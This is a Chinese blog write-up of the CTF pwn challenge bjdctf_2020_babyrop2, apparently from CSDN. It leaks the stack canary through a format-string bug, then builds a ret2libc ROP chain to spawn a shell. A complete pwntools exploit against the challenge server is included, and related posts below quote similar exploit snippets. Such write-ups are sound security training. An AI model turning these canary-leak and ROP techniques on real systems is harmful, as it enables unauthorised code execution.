bjdctf_2020_babyrop2

最新推荐文章于 2022-10-27 10:12:51 发布
最新推荐文章于 2022-10-27 10:12:51 发布
阅读量330 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33010875/article/details/120495723
版权

环境:WSL2,ubuntu16.04,python2

checksec文件:
在这里插入图片描述

PIE保护没开,构造rop链
存在Canary,需要找出Canary的值才能进行地址泄露

文件拖入ida:
在这里插入图片描述
在gift函数发现printf格式化漏洞,可以利用该漏洞获取Canary的值,但需要找出输入点参数在栈上的相对位置(找偏移量)
由于scanf限制了只能输入6个字符,因此不能用

AAAA %x %x %x.......

来泄露值,改为:

aa%6$p   #6是一步步试出来的,可以从1开始尝试,p是十六进制形式

结果:
在这里插入图片描述
aa(6161),%(25),6(36),$(24),p(70) (16进制asll和小端序)
说明格式化字符串的偏移是6

在gift函数中有:

unsigned __int64 v2; // [rsp+8h] [rbp-8h]

使用gdb调试程序:
在这里插入图片描述
查看stack的情况:
在这里插入图片描述
canary的值位于rbp-0x08处,即rbp-0x08 = 0x20 - 0x08 = 0x18

泄露canary的值:
在这里插入图片描述

泄露puts函数的地址:

payload = (0x20-0x08)*'a'+p64(canary)+'a'*8+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
io.sendlineafter("story!\n",payload)

puts_addr = u64(io.recv(6).ljust(8,"\x00"))

求出system函数和bin/sh的地址

libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
sys_addr = libc_base + libc.dump("system")
bin_sh_addr = libc_base + libc.dump("str_bin_sh")

完整exp:

from pwn import *
from LibcSearcher import *

io = remote("node4.buuoj.cn","25836")
elf = ELF("./bjdctf_2020_babyrop2")

main_addr = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln_addr = 0x400887
rdi = 0x0000000000400993 #: pop rdi ; ret

io.sendline('%7$p')
io.recvuntil("0x")
canary = int(io.recv(16),16)
#print hex(canary)

payload = (0x20-0x08)*'a'+p64(canary)+'a'*8+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
io.sendlineafter("story!\n",payload)

puts_addr = u64(io.recv(6).ljust(8,"\x00"))

libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
sys_addr = libc_base + libc.dump("system")
bin_sh_addr = libc_base + libc.dump("str_bin_sh")

payload = (0x20-0x08)*'a'+p64(canary)+'a'*8+p64(rdi)+p64(bin_sh_addr)+p64(sys_addr)
io.sendlineafter("story!\n",payload)

io.interactive()

结果:
在这里插入图片描述

12Shen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 383
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
bjdctf2020 babyrop
pondzhang的专栏
05-09 287
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF 2nd–TARGZ
12-21
审题,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的题目的提示tar不好使(就是不tar压缩的) ...发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao...
justCTF-2020:justCTF 2020
05-24
justCTF-2020 justCTF 2020 和彩云分流: 链接: 提取码:GqUZ
bjdctf2020 babyrop2
pondzhang的专栏
05-23 284
from pwn import * p = process('bjdctf_2020_babyrop2') libcelf = ELF('/lib/x86_64-linux-gnu/libc.so.6') poprdiret = 0x0000000000400993 main = 0x00000000004008DA pltputs = 0x0000000000400610 gotputs = 0x0000000000601018 p.sendlineafter("I'll give u some gif
【BUUCTF】bjdctf_2020_babyrop2
m0_51251108的博客
12-30 337
【BUUCTF】bjdctf_2020_babyrop2 有canary ida看下程序 有格式化漏洞,但有6格宽度限制 有栈溢出 思路:这题靠格式化字符串漏洞泄露出canary的地址 然后栈溢出,ret2libc 泄露方法: 一次一次试过去,找到我们输入的位置的偏移 然后这题里偏移+1就是canary了 然后就能把canary带出来,canary每次运行都不一样 所以要实时接收 一个程序不同函数的canary好像都相同 特别提醒自己在接收环节的处理 exp: from pwn import*
pwn7第七关
qq_18823653的博客
04-03 381
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 423
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
bjdctf_2020_babyrop2(cannary格式化字符泄露)
weixin_61283545的博客
06-11 291
这道题的调试属实有问题。从这道题学到可以利用格式化字符串泄露canary 从调试泄露栈上地址可以很清晰看到bp上8位canary,在偏移为6时发现我们标记的6161aa,它的下8位就是canary。打映出来后接受canary时我们先用recvuntil(“0x”),int(p.recv(16),16)来接受。还有一点cannary在bp前8位值得注意...
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 308
bjdctf_2020_babyrop
bjdctf_2020_babyropbjdctf_2020_babyrop2(格式化字符leak)
beaster1的博客
04-06 423
bjdctf_2020_babyrop 先checksec 打开ida正常查看函数 打开init函数发现puts函数 然后进入vuln函数 存在栈溢出 没有看到后门函数应该是libc leak+rop 代码如下 from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29901) #p=process('') elf=ELF('bjdctf_2020_babyrop') puts_got=elf.got['puts'] p
BUUOJ PWN bjdctf_2020_babyrop2
weixin_50287973的博客
11-12 185
开启的安全机制 main gift 利用格式化字符串泄露canary vuln 栈溢出泄露libc 栈溢出执行system(“bin/sh\x00”) scanf允许输入6字节,输入参数,输出偏移为6的地址,canary的偏移就为7 这样输入%7$p就可以泄露canary EXP from pwn import * from LibcSearcher import LibcSearcher p = remote("node3.buuoj.cn",27004) elf = ELF("./bjdc
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 282
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
BUUCTF bjdctf_2020_babyrop
红叶的博客
10-27 762
今天终于搞明白 ret2libc3 了,不过不知道为什么所有 包括我自己写的PoC,都不能成功获取 ret2libc3 的shell,因此就去做BUUCTF的题了,边看大佬的解析边做。至此 system、/bin/sh 的地址就已经拿到了,只需要重新溢出一次程序,使用刚才获取的地址即可。因为没有开PIE,因此地址是固定的。使用 1 的 Libc 即可获取shell。ROPgadget找pop rdi。gdb动态调试查看需要覆盖的数量。打开IDA Pro看一眼。ret2libc的做法。首先checksec。
[BJDCTF2020]RSA
最新发布
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。它基于两个大素数的乘积作为公钥的一部分,并使用这两个素数的乘积作为私钥的一部分。RSA算法的安全性基于大数分解的难度,即将一个大数分解为其素数因子的难度。 在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值